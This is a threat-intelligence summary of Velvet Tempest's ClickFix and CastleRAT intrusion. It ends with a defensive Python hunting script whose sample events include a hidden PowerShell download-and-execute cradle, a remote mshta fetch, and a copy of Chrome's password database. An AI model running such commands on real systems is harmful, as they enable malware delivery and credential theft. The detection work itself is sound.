Velvet Tempest leverages ClickFix and CastleRAT in ransomware operations
Summary
The threat group Velvet Tempest, also tracked as DEV-0504, has been observed using the ClickFix technique and legitimate Windows utilities to deploy the DonutLoader loader and the CastleRAT backdoor in a replica environment (a decoy built to mirror a U.S. non-profit's network). The group, known for deploying multiple ransomware strains, conducted Active Directory reconnaissance, credential harvesting and environment profiling between February 3 and 16. Initial access came from a malvertising campaign that led victims to a fake CAPTCHA page built on ClickFix, which instructs the visitor to copy and run a command in order to "verify" themselves. Despite the group's ransomware history, Termite ransomware was not deployed in this observed intrusion.
Timeline
- 07.03.2026 18:14 · 1 article
Velvet Tempest observed using ClickFix and CastleRAT in simulated environment
Between February 3 and 16, Velvet Tempest conducted Active Directory reconnaissance, credential harvesting and environment profiling in a replica environment built to mirror a U.S. non-profit organization. The group used PowerShell to harvest credentials stored in Chrome and deployed the DonutLoader loader and the CastleRAT backdoor. Initial access came from a malvertising campaign that led victims to a fake CAPTCHA page using the ClickFix technique. Termite ransomware was not deployed in this observed intrusion.
- Termite ransomware breaches linked to ClickFix CastleRAT attacks — www.bleepingcomputer.com — 07.03.2026 18:14
Information Snippets
- Velvet Tempest, also known as DEV-0504, has been active in ransomware operations for at least five years.
  First reported: 07.03.2026 18:14 (1 source, 1 article)
- The group has deployed ransomware strains such as Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub.
  First reported: 07.03.2026 18:14 (1 source, 1 article)
- The attack was observed between February 3 and 16 in a replica environment for a U.S. non-profit organization with over 3,000 endpoints and 2,500 users.
  First reported: 07.03.2026 18:14 (1 source, 1 article)
- Initial access was gained through a malvertising campaign that led victims to a fake CAPTCHA page using the ClickFix technique, which tricks the visitor into copying and running a command on their own machine.
  First reported: 07.03.2026 18:14 (1 source, 1 article)
- The group used PowerShell to harvest credentials stored in Chrome and deployed the DonutLoader loader and the CastleRAT backdoor.
  First reported: 07.03.2026 18:14 (1 source, 1 article)
- Termite ransomware was not deployed in the observed intrusion despite the group's history with ransomware.
  First reported: 07.03.2026 18:14 (1 source, 1 article)
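A detection check for the two techniques the snippets above name: a ClickFix paste that launches a Windows utility from the Run dialog, and PowerShell touching the Chrome saved-password store. This is an added example written for this page, not code from the BleepingComputer report or from any vendor tooling. The key="value" event format, the field names, the indicator list, the scoring threshold and the sample events are all assumptions made here; the report does not publish the group's command lines, and the "I am not a robot" comment is a pattern seen in generic ClickFix lures, not one attributed on this page to Velvet Tempest.

```python
"""Hunt process-creation telemetry for ClickFix-style initial access and for
PowerShell access to the Chrome credential store.

Added example, not code from the page or the report it summarises. The event
format, field names, indicators, threshold and sample events are constructed
for illustration; map the field names onto your own EDR/Sysmon schema.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Assumed format: one event per line, quoted key="value" fields (Sysmon Event ID 1 style).
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# Windows utilities commonly abused as the runner for a pasted ClickFix command.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "certutil.exe", "curl.exe", "msiexec.exe", "rundll32.exe"}

# (label, case-insensitive regex over the command line); each hit adds one point.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_cmd",   re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("iex",           re.compile(r"\biex\b|invoke-expression", re.I)),
    ("remote_fetch",  re.compile(r"https?://|downloadstring|\biwr\b|invoke-webrequest|\bcurl\b", re.I)),
    ("captcha_lure",  re.compile(r"not a robot|captcha|verification id", re.I)),
]

# Chrome's saved-password database; PowerShell reading it is the harvesting step
# the report describes (assumed path pattern, Chrome's default profile layout).
CHROME_CREDS_RE = re.compile(r"google\\chrome\\user data.*login data|\blogin data\b", re.I)


@dataclass
class Finding:
    rule: str
    user: str
    image: str
    reasons: list
    score: int


def parse_event(line: str) -> dict:
    return {k: v for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_clickfix(ev: dict) -> Optional[Finding]:
    """Flag a LOLBin launched from explorer.exe (Win+R / Run dialog) with at least one
    obfuscation or download indicator, or any LOLBin with three or more indicators."""
    image = basename(ev.get("Image", ""))
    if image not in LOLBINS:
        return None
    cmd = ev.get("CommandLine", "")
    reasons = []
    # Explorer as parent is weak evidence on its own: users run things from Win+R too.
    if basename(ev.get("ParentImage", "")) == "explorer.exe":
        reasons.append("spawned_by_explorer")
    reasons += [label for label, rx in INDICATORS if rx.search(cmd)]
    score = len(reasons)
    if (score >= 2 and "spawned_by_explorer" in reasons) or score >= 3:
        return Finding("clickfix_chain", ev.get("User", "?"), image, reasons, score)
    return None


def check_browser_creds(ev: dict) -> Optional[Finding]:
    image = basename(ev.get("Image", ""))
    if image in {"powershell.exe", "pwsh.exe"} and CHROME_CREDS_RE.search(ev.get("CommandLine", "")):
        return Finding("chrome_credential_store_access", ev.get("User", "?"), image,
                       ["login_data_path"], 1)
    return None


def hunt(lines) -> list:
    findings = []
    for line in lines:
        ev = parse_event(line)
        for check in (score_clickfix, check_browser_creds):
            f = check(ev)
            if f:
                findings.append(f)
    return findings


# Constructed sample events (not from the report). 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    # 1: benign Run-dialog launch, not a LOLBin
    r'Image="C:\Windows\System32\notepad.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="notepad C:\Users\jdoe\todo.txt" User="CORP\jdoe"',
    # 2: ClickFix paste: hidden window, download cradle, lure text carried in a trailing comment
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell -w hidden -nop -c iex (iwr http://198.51.100.7/v) # I am not a robot - reCAPTCHA Verification ID: 7391" User="CORP\jdoe"',
    # 3: mshta variant of the same lure
    r'Image="C:\Windows\System32\mshta.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="mshta http://198.51.100.7/a.hta" User="CORP\jdoe"',
    # 4: user legitimately runs a script from Win+R: explorer parent, no other indicator
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell -File C:\Users\jdoe\scripts\backup.ps1" User="CORP\jdoe"',
    # 5: admin command from a terminal
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\System32\cmd.exe" CommandLine="powershell -c Get-Service -Name Spooler" User="CORP\admin"',
    # 6: post-compromise copy of the Chrome password database by an unknown parent
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Users\Public\svc.exe" CommandLine="powershell -nop -c Copy-Item $env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data C:\Users\Public\ld.db" User="CORP\jdoe"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.rule:32} user={f.user} image={f.image} score={f.score} reasons={','.join(f.reasons)}")
```

Events 2, 3 and 6 are reported; event 4 is deliberately left alone, since a PowerShell child of explorer.exe with a plain script path is what a user running their own script from Win+R looks like, and flagging every such launch is the fastest way to get the rule switched off. In production the same logic is usually paired with the RunMRU registry key or clipboard telemetry, which this sketch does not model.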